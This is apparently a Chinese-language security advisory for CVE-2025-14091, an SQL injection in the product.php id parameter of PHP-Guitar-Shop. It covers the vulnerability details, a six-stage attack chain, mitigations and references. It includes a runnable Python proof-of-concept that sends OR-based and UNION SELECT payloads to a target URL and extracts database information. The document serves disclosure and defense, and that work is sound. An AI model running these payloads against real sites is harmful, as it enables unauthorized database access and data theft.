CVE-2025-14091 TrippWasTaken PHP-Guitar-Shop SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-14091

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

TrippWasTaken PHP-Guitar-Shop

漏洞概述

CVE-2025-14091是存在于TrippWasTaken开发的PHP-Guitar-Shop开源电子商务系统中的一处高危SQL注入漏洞。该漏洞存在于产品详情页面（/product.php）的ID参数处理逻辑中，攻击者可通过构造恶意的SQL语句实现未授权的数据库操作。受影响的代码版本至commit 6ce0868889617c1975982aae6df8e49555d0d555。由于该产品采用滚动发布模式，版本号信息不明确，但可以确定所有使用受影响代码分支的用户均存在安全风险。漏洞CVSS评分达到7.3分，属于高危级别，具有网络远程利用能力，无需认证和用户交互即可发起攻击。此漏洞已被公开披露并存在可用的利用代码，攻击者可能利用该漏洞窃取敏感用户数据、绕过认证机制或对数据库进行恶意操作。建议使用该产品的用户立即采取防护措施并关注官方更新。

技术细节

该SQL注入漏洞存在于PHP-Guitar-Shop的product.php文件中的产品详情页面功能模块。漏洞的根本原因在于对用户输入的ID参数缺乏有效的输入验证和SQL语句参数化处理。当用户请求产品详情页面时，系统直接使用GET或POST方式接收的ID参数值拼接SQL查询语句，而未进行充分的过滤或使用预编译语句（Prepared Statements）。攻击者可以通过在ID参数中注入SQL元字符和恶意SQL代码片段，实现联合查询注入、布尔盲注或时间盲注等攻击手法。例如，攻击者可构造形如ID=1' OR '1'='1的Payload绕过认证，或使用UNION SELECT语句提取数据库中的用户密码、信用卡信息等敏感数据。由于该漏洞影响的是产品查询功能，攻击者还可能通过构造复杂的嵌套查询对数据库服务器造成性能影响，甚至读取服务器文件系统内容（取决于数据库配置和权限）。该漏洞可被远程利用，攻击复杂度低，且已有公开的利用代码可供攻击者使用。

攻击链分析

STEP 1

1

侦察阶段：攻击者识别目标网站使用的PHP-Guitar-Shop系统，并定位到存在漏洞的产品详情页面（/product.php）

STEP 2

2

探测阶段：攻击者构造包含SQL特殊字符的探测Payload（如单引号、反斜杠等），观察系统返回的差异化响应，验证SQL注入漏洞的存在

STEP 3

3

注入阶段：利用UNION SELECT、布尔盲注或时间盲注等技术，构造恶意的SQL语句片段，绕过输入过滤机制

STEP 4

4

数据提取阶段：通过构造的SQL注入Payload，从数据库中提取敏感信息，如用户账户、密码哈希、订单数据、支付信息等

STEP 5

5

持久化阶段：攻击者可能创建数据库后门账户或修改现有数据，实现对系统的长期控制

STEP 6

6

横向移动：根据获取的凭据信息，尝试访问其他相关系统或管理后台，扩大攻击范围

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14091 SQL Injection PoC for TrippWasTaken PHP-Guitar-Shop
# Target: /product.php?id= parameter

def test_basic_injection(url):
    """Test basic SQL injection vulnerability"""
    payload = "1' OR '1'='1"
    target_url = f"{url}/product.php?id={payload}"
    
    print(f"[*] Testing target: {target_url}")
    
    try:
        response = requests.get(target_url, timeout=10)
        
        # Check for SQL error messages indicating vulnerability
        sql_errors = [
            "SQL syntax",
            "mysql_fetch",
            "mysqli_fetch",
            "Warning: mysql",
            "SQLite3::query",
            "PGresult",
            "syntax error or access violation"
        ]
        
        for error in sql_errors:
            if error.lower() in response.text.lower():
                print(f"[!] VULNERABLE! SQL error detected: {error}")
                return True
        
        if response.status_code == 200 and len(response.text) > 100:
            print("[+] Potential vulnerability - no SQL errors but page loads")
            return True
            
    except requests.RequestException as e:
        print(f"[!] Request failed: {e}")
        return False
    
    return False

def test_union_injection(url):
    """Test UNION-based SQL injection"""
    # Determine number of columns (adjust based on application)
    for i in range(1, 10):
        payload = f"1' UNION SELECT {','.join(['NULL']*i)}-- -"
        target_url = f"{url}/product.php?id={payload}"
        
        try:
            response = requests.get(target_url, timeout=10)
            if response.status_code == 200 and "NULL" not in response.text:
                print(f"[+] Found {i} columns for UNION injection")
                return i
        except:
            continue
    return None

def extract_data(url, num_cols):
    """Extract database information using UNION injection"""
    # Common database extraction payload
    payload = f"1' UNION SELECT {','.join(['@@version']*num_cols)}-- -"
    target_url = f"{url}/product.php?id={payload}"
    
    print(f"[*] Extracting database version...")
    
    try:
        response = requests.get(target_url, timeout=10)
        # Parse response for database version
        if response.status_code == 200:
            print(f"[+] Database info extracted (check response for details)")
            return response.text[:500]
    except:
        pass
    
    return None

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-14091-poc.py <target_url>")
        print("Example: python cve-2025-14091-poc.py http://vulnerable-site.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    
    print("=" * 60)
    print("CVE-2025-14091 SQL Injection PoC")
    print("Target: TrippWasTaken PHP-Guitar-Shop /product.php")
    print("=" * 60)
    
    if test_basic_injection(target):
        print("\n[*] Proceeding with detailed testing...")
        cols = test_union_injection(target)
        if cols:
            extract_data(target, cols)
    else:
        print("[-] Target may not be vulnerable")

影响范围

PHP-Guitar-Shop <= 6ce0868889617c1975982aae6df8e49555d0d555 (所有使用该commit及之前代码的版本)

防御指南

临时缓解措施

在官方安全补丁发布之前，建议采取以下临时缓解措施：首先，在Web服务器层面配置URL参数过滤规则，拦截包含SQL特殊字符（如单引号、双引号、分号、注释符等）的请求；其次，临时限制product.php页面的访问，对ID参数实施严格的数值类型验证，拒绝非数字输入；再次，在应用代码中临时添加SQL注入检测逻辑，对异常请求进行记录和阻断；最后，考虑临时关闭产品查询功能或切换到备用系统，待漏洞修复后再恢复服务。同时建议加强安全监控，密切关注是否存在针对该漏洞的扫描和利用行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14091
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14091
3 Details https://www.cvedetails.com/cve/CVE-2025-14091/
4 VulDB https://vuldb.com/cve/CVE-2025-14091
5 Link https://github.com/appaxv/report/blob/main/guitarshopsql.docx
6 Link https://vuldb.com/?ctiid.334481
7 Link https://vuldb.com/?id.334481
8 Link https://vuldb.com/?submit.696514